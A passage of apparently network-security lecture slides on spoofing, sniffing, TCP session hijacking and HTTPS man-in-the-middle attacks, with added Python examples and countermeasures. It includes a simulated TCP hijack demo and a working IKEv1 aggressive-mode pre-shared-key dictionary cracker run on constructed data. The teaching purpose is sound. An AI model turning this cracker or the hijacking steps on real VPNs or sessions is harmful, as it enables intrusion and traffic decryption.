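    """Mean number of guesses before one lands in the window: 2^32 / window."""
    return SEQ_SPACE // rcv_wnd


# Constructed scenario: the client has just sent "ls\r\n" on a telnet session, so the
# server end now expects SEQ 0x10000004. The forged command is constructed too.
CLIENT_HEADER = struct.pack("!HHIIBBHHH", 40000, 23, 0x10000000, 0x20000000, 5 << 4, 0x18, 65535, 0, 0)
CLIENT_PAYLOAD = b"ls\r\n"
FORGED = b"id\r\n"


def demo() -> dict:
    sniffed = TcpReceiver(rcv_nxt=0x10000004, rcv_wnd=65535)
    accepted = hijack_with_sniffer(sniffed, CLIENT_HEADER, CLIENT_PAYLOAD, FORGED)
    blind = TcpReceiver(rcv_nxt=0x10000004, rcv_wnd=65535)
    hits = hijack_blind(blind, attempts=100_000, rng=random.Random(1))
    return {"sniffed_accepted": accepted, "sniffed_delivered": sniffed.delivered == [FORGED],
            "blind_in_window_hits": hits, "blind_expected_attempts": expected_blind_attempts(65535)}
```

With a 64 KiB window a blind guess has roughly a 1-in-65537 chance of even being accepted, and acceptance is not delivery: only the exact RCV.NXT value is handed to the application immediately. The sniffing attacker gets that value for free from the last segment on the wire, which is the whole difference between the two categories.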
Ways to Stop the Hijacked Host from Sending Packets
A common way is to run a Denial-of-Service (DoS) attack against one endpoint so that it stops responding; otherwise the real host's own packets and the forged ones would conflict. The DoS can be
- against the machine, to force it to crash, or
- against its network connection, to force heavy packet loss.
Another approach is to send packets carrying commands that ask the recipient not to send a response back.
Man in the Middle Attack (HTTPS)
[Figure: client (browser), attacker machine 1, attacker machine 2, server]
1. Client requests an HTTPS connection, which reaches attacker machine 1 instead of the server
2. Attacker machine 1 requests its own HTTPS connection to the server
3. Server provides its certificate with its public key to the attacker; the attacker presents a certificate of his own to the client
4. Server provides the HTTP response, which the attacker relays; the attacker waits for the session to be created and passes the session id to attacker machine 2
5. Client's subsequent requests go to attacker machine 1
6. Attacker machine 1 forwards the requests to the server; attacker machine 2 sends its own request with the session id and receives a successful response
MitM Attacks
"Man-in-the-middle" refers to a machine set up so that the traffic between two other machines has to pass through it.
Difficult to set up over the Internet; not so difficult in a LAN environment (ARP spoofing, as above).
A MitM can do everything a sniffer does and can additionally alter, inject or drop traffic; in its simplest use it is just a way to implement a sniffer on a network where plain sniffing no longer works.
Defence:
- Encryption, with authentication of the other endpoint. A MitM can itself act as an intermediate encrypter, terminating the encryption on both sides; only verified certificates or keys stop that.
- Strong perimeter security against Internet MitM attacks.
- Security is only as strong as the weakest link: the MitM can attack from either end. Even if your side is well protected and your partner's is not, the MitM is possible from the partner's end.
Prevention of Sniffing
- Segment the network into trustworthy segments using bridges, or better yet switches, so that a frame only reaches the ports it is meant for.
- It is not enough to "not allow sniffing": it is easy to plug another machine into the network.
- Consider X terminals instead of full workstations, so users have no machine of their own on which to run a sniffer.
Prevention of Sniffing (more)
- Avoid transmitting passwords at all. One old solution was the r-family (rlogin, rcp, rsh, etc.) with trusted hosts listed in .rhosts; many system administrators do not want users to use them, and they are insecure in their own right, since host-based trust is exactly what IP and ARP spoofing defeat.
- Use protocols that never send the password in clear: Kerberos, or public keys (PGP).
Prevention of MAC Spoofing
- VERY difficult.
- Intelligent hubs (managed switches with port security) can be configured to expect certain MAC addresses on certain ports,
- but machines can still be swapped, so
- physical measures (controlling who can plug in where) are still needed.
Prevention of ARP Spoofing
Basic premise: ARP TRUSTS EVERY RESPONSE.
- If the machine is one you need to trust, make a PERMANENT (static) entry in the ARP cache, e.g. arp -s <ip-address> <mac-address>; a static entry is not overwritten by replies.
- Use an ARP server that answers on behalf of the hosts, and do not let machines respond for themselves. This makes administration a little more cumbersome but is probably worth it;
- but the server itself can be spoofed.
Countermeasures
IP spoofing
- Protect against it with good firewall rules and router filters: keep your own machines from launching packets with spoofed source addresses (egress filtering) and drop incoming packets whose source belongs to your own network (ingress filtering).
- Limit configuration access on machines.
- Run programs like arpwatch that keep track of IP/MAC pairings and report changes.
- The best way to protect against source-routing spoofing is simply to disable source routing at your routers.
Email spoofing
- Most email servers today do not allow open relaying: they only accept mail from their own range of IP addresses, or mail addressed to their own domain. The attacker can run his own mail server, but then he is easier to trace.
- Defence: do not allow email relaying on your SMTP servers.
Web spoofing
- Use a server-side certificate. Still, users should:
- examine the browser location and status line,
- examine links in the HTML source code,
- disable "active" content (Java, JavaScript, ActiveX) in the browser,
- ensure that the browser starts on a "secure page" (a local HTML page).
Countermeasures - Encryption
The most effective countermeasure is encryption such as IPsec. IP Security can encrypt your IP packets with keys derived from a pre-shared key (PSK) or, in more complex deployments, from a public key infrastructure (PKI).
This also defends against many other attack vectors such as sniffing: the attacker may still passively monitor the connection, but cannot read the data because all of it is encrypted.
There are actions an attacker may be able to take against an IPsec network, depending on whether IKE with pre-shared keys or PKI is used to manage the keys, but they require an experienced attacker.
Do not think that IPsec is the panacea for all your ills: there are IPsec cracking tools on the Internet that, given a captured IKE exchange, try to guess the PSK offline by dictionary attack, and a recovered PSK lets them decrypt the traffic. Aggressive mode with PSK is the weak case, because the authenticating hash is sent unencrypted; main mode is considerably harder to attack, and certificate-based authentication removes the PSK altogether.
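The PSK-guessing tools mentioned above work on IKEv1 aggressive mode, where the responder's HASH_R and every other input to it are sent unencrypted. The following Python code, added as an example and not part of the original slides, reproduces that offline dictionary attack with the RFC 2409 formulas; the "captured" exchange is a constructed stand-in with filler nonces, cookies, DH values and IDs, and the wordlist is made up.

```python
import hashlib
import hmac


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes, prf=hashlib.sha1) -> bytes:
    """RFC 2409 section 5.4, pre-shared key authentication: SKEYID = prf(PSK, Ni_b | Nr_b)."""
    return hmac.new(psk, ni_b + nr_b, prf).digest()


def hash_r(skeyid: bytes, x: dict, prf=hashlib.sha1) -> bytes:
    """RFC 2409 section 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return hmac.new(skeyid, x["g_xr"] + x["g_xi"] + x["cky_r"] + x["cky_i"] + x["sai_b"] + x["idir_b"],
                    prf).digest()


def crack_psk(exchange: dict, wordlist):
    """Offline dictionary attack: in aggressive mode every input to HASH_R except the PSK is
    in the clear, so each candidate is verified locally without ever touching the gateway."""
    for candidate in wordlist:
        guess = hash_r(skeyid_psk(candidate.encode(), exchange["ni_b"], exchange["nr_b"]), exchange)
        if hmac.compare_digest(guess, exchange["hash_r"]):
            return candidate
    return None


def make_exchange(psk: bytes) -> dict:
    """Constructed stand-in for the two aggressive-mode messages an attacker would capture.
    Nonces, cookies, DH public values, SA body and ID body are fixed filler, not real output."""
    fields = {
        "ni_b": bytes.fromhex("0a" * 16), "nr_b": bytes.fromhex("0b" * 16),
        "cky_i": bytes.fromhex("0c" * 8), "cky_r": bytes.fromhex("0d" * 8),
        "g_xi": bytes.fromhex("0e" * 128), "g_xr": bytes.fromhex("0f" * 128),
        "sai_b": bytes.fromhex("aa" * 20),
        "idir_b": bytes.fromhex("01110000c0000201"),   # ID_IPV4_ADDR, UDP, port 0, 192.0.2.1 (filler)
    }
    fields["hash_r"] = hash_r(skeyid_psk(psk, fields["ni_b"], fields["nr_b"]), fields)
    return fields


# Constructed wordlist; the real tools read a dictionary file.
WORDLIST = ["password", "vpn123", "summer2009", "Admin!234"]
```

Because the verification is purely local, the attacker's cost is one HMAC pair per candidate and no rate limiting applies; a PSK that survives this must not be in any wordlist, which in practice means a long random one, or certificates instead.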
Countermeasures - Encrypted Applications
Other countermeasures are encrypted applications such as ssh (Secure Shell, an encrypted replacement for telnet) or SSL (Secure Sockets Layer, i.e. HTTPS traffic).
This again comes down to using encryption, the subtle difference being that the encryption is done inside the application.
Be aware, though, that there are known attacks against ssh and SSL, most of them aimed at the endpoints' failure to verify who they are talking to rather than at the ciphers.
OWA (Outlook Web Access) uses SSL to encrypt the data between an Internet client browser and the Exchange mail server, but tools like Cain & Abel can present a forged server certificate and mount a man-in-the-middle (MITM) attack: if the user clicks through the browser's certificate warning, the tool decrypts everything.